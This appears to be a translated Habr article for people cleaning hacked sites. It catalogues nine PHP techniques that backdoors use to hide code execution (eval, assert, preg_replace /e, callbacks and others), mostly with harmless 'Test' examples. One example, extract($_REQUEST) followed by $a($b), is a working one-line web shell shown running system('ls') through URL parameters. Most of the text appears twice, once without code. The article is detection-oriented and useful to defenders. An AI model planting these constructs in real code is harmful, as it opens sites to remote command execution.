Implicit php code call techniques used in malicious scripts
In the process of treating sites, there are many varieties of hacker shells and backdoors. The scripts differ in the functionality and way of obfuscating the source code, but everyone has a common feature - this is an implicit declaration of variables and functions, as well as an indirect function call.
This approach is popular among developers of malicious code, since, on the one hand, it greatly complicates the analysis of the source code, and on the other hand, it allows you to store code in text data. For example, a piece of malicious code may be downloaded from a third-party site, from a database, jpeg / png / gif meta-data, or transmitted in a request to a script. In addition, the part of the code, represented as a plain text string, can be easily encrypted.
By the way, the same techniques are used by web developers and for peaceful purposes in scripts for checking license keys and registering web applications to make it difficult to hack software products.
')
Despite the diversity of malicious code, there are not many options for ads and indirect function call. Below are examples of various techniques for hidden code call. For simplicity and clarity, let “malicious code” be presented as a challenge.
which displays the word "Test" on the page. Naturally, in real shells and backdoors, the names of variables and functions, as well as the executable code, are not stored in clear text and in most cases obfuscated.
Option 1: indirect function call
Option 2: Eval code execution
Option 3: code execution through assert
Option 4: code execution via array_map
Option 5: code execution via preg_replace ('/.*/ e')
Option 6: code execution via preg_replace_callback
Option 7: code execution via usort, uasort, uksort
Option 8: hidden function declaration and parameter passing through extract
When launching site.ru/script.php?a=system&b=ls, it will perform the system function system ("ls")
Option 9: through registration of the completion function (you can do exit () or die () for immediate execution)
The same approach can be used with all calls that take a callable function as an argument: call_user_func_array (), call_user_func (), forward_static_call_array, forward_static_call (), register_tick_function (). Although in real shells and backdoors we did not encounter calls through these functions, options 1 through 8 are usually used.
In real backdoors, the above options are used in the complex, and the declarations of variables and functions themselves are often taken out of the script (for example, downloaded from a database, from a remote server, or from metadata of images).
This approach is popular among developers of malicious code, since, on the one hand, it greatly complicates the analysis of the source code, and on the other hand, it allows you to store code in text data. For example, a piece of malicious code may be downloaded from a third-party site, from a database, jpeg / png / gif meta-data, or transmitted in a request to a script. In addition, the part of the code, represented as a plain text string, can be easily encrypted.
By the way, the same techniques are used by web developers and for peaceful purposes in scripts for checking license keys and registering web applications to make it difficult to hack software products.
')
Despite the diversity of malicious code, there are not many options for ads and indirect function call. Below are examples of various techniques for hidden code call. For simplicity and clarity, let “malicious code” be presented as a challenge.
echo "Test" which displays the word "Test" on the page. Naturally, in real shells and backdoors, the names of variables and functions, as well as the executable code, are not stored in clear text and in most cases obfuscated.
Option 1: indirect function call
<?php $a = "var_dump"; $b = "Test"; $a($b); ?> Option 2: Eval code execution
<?php eval('$a = "Test"; echo $a;'); ?> Option 3: code execution through assert
<?php assert('print("Test")'); ?> Option 4: code execution via array_map
<?php function evil($a) { echo $a; } array_map('evil', array("Test")); ?> Option 5: code execution via preg_replace ('/.*/ e')
<?php preg_replace('/.*/e', 'print("Test")', ''); ?> Option 6: code execution via preg_replace_callback
<?php $a = function () { echo "Test"; }; preg_replace_callback('/.*/', $a, ''); ?> Option 7: code execution via usort, uasort, uksort
<?php $a = function ($x, $y) { echo "Test"; }; $b = array(1 => '1', 2 => '2'); usort( $b, $a); ?> Option 8: hidden function declaration and parameter passing through extract
<?php extract($_REQUEST); $a($b); ?> When launching site.ru/script.php?a=system&b=ls, it will perform the system function system ("ls")
Option 9: through registration of the completion function (you can do exit () or die () for immediate execution)
<?php register_shutdown_function(create_function('', "echo 'Test';")); ?> The same approach can be used with all calls that take a callable function as an argument: call_user_func_array (), call_user_func (), forward_static_call_array, forward_static_call (), register_tick_function (). Although in real shells and backdoors we did not encounter calls through these functions, options 1 through 8 are usually used.
In real backdoors, the above options are used in the complex, and the declarations of variables and functions themselves are often taken out of the script (for example, downloaded from a database, from a remote server, or from metadata of images).
Source: https://habr.com/ru/post/215139/
All Articles